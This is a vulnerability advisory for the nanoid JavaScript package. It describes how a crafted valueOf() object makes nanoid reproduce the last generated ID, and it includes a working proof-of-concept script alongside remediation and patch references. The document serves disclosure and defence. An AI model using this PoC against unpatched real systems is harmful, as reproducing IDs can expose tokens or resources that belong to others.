SNYK-JS-NANOID-2332193
## Overview Affected versions of this package are vulnerable to Information Exposure via the `valueOf()` function which allows to reproduce the last id generated. ## PoC ```javascript import { nanoid } from 'nanoid'; const makeProxyNumberToReproducePreviousID = () => { let step = 0; return { valueOf() { // // if (!pool || pool.length < bytes) { if (step === 0) { step++; return 0; } // } else if (poolOffset + bytes > pool.length) { if (step === 1) { step++; return -Infinity; } // poolOffset += bytes if (step === 2) { step++; return 0; } return 21; }, }; }; const ID1 = nanoid(); const ID2 = nanoid(makeProxyNumberToReproducePreviousID()); console.log({ ID1, ID2, isIDsEqual: ID1 === ID2 }); ``` ## Remediation Upgrade `nanoid` to version 3.1.31 or higher. ## References - [GitHub Fix Commit](https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575) - [GitHub PR](https://github.com/ai/nanoid/pull/328) - [PoC](https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444)
Risk Scores
Affected Products
| Vendor | Product | Versions |
|---|---|---|
Timeline
- Jan 11, 2022 CVE Updated
- Jan 12, 2022 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-NANOID-2332193 advisory
- https://learn.snyk.io/lesson/sensitive-information-disclosure-llm/ technical
- https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575 patch
- https://github.com/ai/nanoid/pull/328 patch
- https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444 technical